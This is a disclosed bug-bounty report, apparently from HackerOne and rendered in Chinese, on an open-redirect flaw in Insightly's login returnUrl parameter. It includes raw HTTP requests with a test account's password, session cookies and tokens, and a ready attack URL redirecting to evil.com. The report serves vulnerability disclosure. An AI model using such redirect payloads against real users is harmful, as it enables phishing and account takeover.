Insightly | 报告 #1544236 - returnUrl= 参数允许攻击者将用户重定向至钓鱼网站并窃取凭证 | HackerOne
时间线
basant0x01 向 Insightly 提交报告。
2022年4月19日,6:51 AM UTC
报告内容
团队您好,
在测试应用程序 https://crm.na1.insightly.com 时,我发现了一个有趣的参数,通过该参数能够将用户重定向至其他域名,并可能劫持受害者账户。此问题出现在登录认证环节,因此存在轻易接管受害者账户的风险。
漏洞URL
https://crm.na1.insightly.com/User/FrontDoorLogin/?token=fAPkY7H7fgz6AugiWS1HqmgQro69VkrFfjz%2fWKUbuJKtOIbCH0Npi1DvVp0kXUo7JYrQ2Kep6VUOybmgBo6q9byEMy3Itsa35Ra60cK2eUFK6i78lKdX4%2fQN4Ln3UPEzfpMTvk8ocH6Ikix0zKolaN%2f0kaMWB3Ia4GCVOvTPhfZUGkgOY%2fHMC9ZCrdjXMNP%2fjoOqZ%2foqBrFRu4tCE%2fmX%2fJW5o3J18Hx9MOuOVCNgs1mD8zKjIz1uSW%2boBmu%2bMfXT&returnUrl=http%3a%2f%2f192.168.1.77%3a8000%2f
此URL仅一次性有效,每次新攻击或重定向需生成新URL。
复现步骤
- 访问网站 [crm.na1.insightly.com] 并使用凭据登录。
- 拦截请求,您将获得以下请求:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
POST /User/AuthenticateForms HTTP/1.1
Host: login.insightly.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Origin: https://login.insightly.com
Connection: close
Referer: https://login.insightly.com/User/Login?ReturnUrl=%2f
Cookie: _sp_ses.7ea0=*; _sp_id.7ea0=f284c58a-fddc-4d25-be6f-72f320bc4ce3.1650349456.1.1650350244.1650349456.792d3660-5b12-4146-b8d5-114c86c5fded; _ga=GA1.2.502174674.1650349457; _gid=GA1.2.8955303.1650349457; _clck=orzge0|1|f0r|0; _clsk=hdl3b6|1650350248802|3|1|a.clarity.ms/collect; _gcl_au=1.1.368515797.1650349583; optimizelyEndUserId=oeu1650349584844r0.9398955011674065; AWSALB=Y3Fjm3LQsxNKT84McWot52MHU2C/HwfKbq+s74yUTTH2TEx2nF+3XmMjln92tMk76u648lSWWcAxdgiExZPj1hoJjECf7KtNZJETE9f4L/MeRALwV+7n8nE7sp8i; AWSALBCORS=Y3Fjm3LQsxNKT84McWot52MHU2C/HwfKbq+s74yUTTH2TEx2nF+3XmMjln92tMk76u648lSWWcAxdgiExZPj1hoJjECf7KtNZJETE9f4L/MeRALwV+7n8nE7sp8i; __RequestVerificationToken=QCRlZvTgq1rk1IUSbo8mRy-mB7iuijVFW86khR6ZnGbFMug6h6VoK9i31B-I7H-u9D96HtrUMXH6RmwEmgFNbIz50Yg1; X-FrontDoor-ReturnUrl=2edc8651-06eb-403a-96c8-272da3cd9efa; X-FrontDoor-AppId=3a16582b-b1f0-4306-a2ba-397c731514a4; _uetsid=565beaf0bfa911ecb94aef8d37202906; _uetvid=565bd680bfa911ecad8d2b88a420a93c
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
__RequestVerificationToken=4BVQV2MAdvcy2OyK6O0n3y42YRSJDDLcxesTFOeBBnwMLe1tiW_wCpMUoVZOop4wu1SxC95l_rcYoEGGWnzriUmmZJE1&email=ilovebugbounty%40gmail.com&password=AMRIT007qwerty%23&ReturnUrl=%2F&AppId=
|
- 将参数
ReturnUrl=%2F 修改为 ReturnUrl=https://evil.com。
- 发送请求。
- 您将收到如下GET URL:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
GET /User/FrontDoorLogin/?token=YrkOz7vdHHA9AH7B%2fY5jUdIP1%2bchPdePfn0Zm7uCtVQui0tHHMW24B14WwsYP5%2bKpa3Xz7%2f5r5muQa3EB%2bQEwtPlJ8XbvozoLZFfhD75Sm3tKLhdgfWWHYq8abV2%2bpOtifD1I5N2uomDBXvMQ8tjFREb39XDuUcrObQMUsqboMZY9dojVqORmIYwb4VPyoSBaYOF4%2bYOX3GTYj8t1ArOA0xeH4oorz6flU6FLrfTLdtG6u%2fC7vZ9CfvsfH3F%2bBye&returnUrl=https://evil.com HTTP/1.1
Host: crm.na1.insightly.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://login.insightly.com/
Connection: close
Cookie: _sp_ses.7ea0=*; _sp_id.7ea0=f284c58a-fddc-4d25-be6f-72f320bc4ce3.1650349456.1.1650350244.1650349456.792d3660-5b12-4146-b8d5-114c86c5fded; _ga=GA1.2.502174674.1650349457; _gid=GA1.2.8955303.1650349457; _clck=orzge0|1|f0r|0; _clsk=hdl3b6|1650350248802|3|1|a.clarity.ms/collect; _gcl_au=1.1.368515797.1650349583; optimizelyEndUserId=oeu1650349584844r0.9398955011674065; snaptid=sac1prdc01ap32; __CustomRequestVerificationToken=ba8vT_9GKG9c0C5ouvyDnb6dib23sbOGJDcGfABOsc7nWF0b4EDAJ6rndoYccjq97kyMQUgXaVNze4B9qLr_L6JKVxc1; __CustomRequestVerificationToken_FormFieldToken=yMCVyZ-Lf9cVa5jCl7aMUt0X7F_OIv31VPzzgEenFFItTXoJKRblcOHfQcrZ5J6cGRcyi444j1U6iVu9zMsRh6wYS-2X5UvW3wbEtQTrhgBrMGs1WkyBLkc6JFdwb2yVRXEJ4A2; __CustomRequestVerificationToken_RequestHeader=ba8vT_9GKG9c0C5ouvyDnb6dib23sbOGJDcGfABOsc7nWF0b4EDAJ6rndoYccjq97kyMQUgXaVNze4B9qLr_L6JKVxc1:yMCVyZ-Lf9cVa5jCl7aMUt0X7F_OIv31VPzzgEenFFItTXoJKRblcOHfQcrZ5J6cGRcyi444j1U6iVu9zMsRh6wYS-2X5UvW3wbEtQTrhgBrMGs1WkyBLkc6JFdwb2yVRXEJ4A2; __RequestVerificationToken=wPFGU1uIataG6NwAZqD3eSkHbpqcI_uL95kRCj3JVRzNwWDPjKEzT6Y7gBcVjRxo18lPLGKF0qezBquaDeAuHBPbIfA1; _sp_ses.4737=*; _sp_id.4737=db22efce-2016-4e0a-b209-3fa6d6e03a33.1650349600.1.1650349859.1650349600.9e684406-e88a-47b0-aea8-43f727a538ce; __utma=257427929.502174674.1650349457.1650349601.1650349601.1; __utmb=257427929.4.10.1650349601; __utmc=257427929; __utmz=257427929.1650349601.1.1.utmcsr=accounts.insightly.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _ga=GA1.4.502174674.1650349457; _gid=GA1.4.8955303.1650349457; error=; _uetsid=565beaf0bfa911ecb94aef8d37202906; _uetvid=565bd680bfa911ecad8d2b88a420a93c
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-site
Sec-Fetch-User: ?1
|
- 复制该URL和域名。最终攻击URL如下:
1
|
https://crm.na1.insightly.com/User/FrontDoorLogin/?token=fAPkY7H7fgz6AugiWS1HqmgQro69VkrFfjz/WKUbuJKtOIbCH0Npi1DvVp0kXUo7JYrQ2Kep6VUOybmgBo6q9byEMy3Itsa35Ra60cK2eUFK6i78lKdX4/QN4Ln3UPEzfpMTvk8ocH6Ikix0zKolaN/0kaMWB3Ia4GCVOvTPhfZUGkgOY/HMC9ZCrdjXMNP/joOqZ/oqBrFRu4tCE/mX/JW5o3J18Hx9MOuOVCNgs1mD8zKjIz1uSW+oBmu+MfXT&returnUrl=https://evil.com
|
影响
攻击者可轻松将URL重定向至钓鱼网站,并通过登录端点劫持受害者账户。
附件
2个附件:
F1698318: redirect.png
F1698323: evil.png
后续活动
- basant0x01 多次询问进展并提供POC视频。
- HackerOne分析团队于2022年7月6日确认审查,并将严重性从高调整为低,后于2023年1月24日调整为中。
- Insightly团队确认漏洞并奖励basant0x01。
- 漏洞于2023年8月3日确认修复,报告于2025年6月4日公开。
报告详情
- 报告时间:2022年4月19日,6:51 AM UTC
- 报告者:basant0x01
- 报告对象:Insightly
- 报告ID:#1544236
- 状态:已解决
- 严重性:中(4 ~ 6.9)
- 公开时间:2025年6月4日,1:12 PM UTC
- 弱点: improper Authentication - Generic
- CVE ID:无
- 赏金:隐藏
- 账户详情:无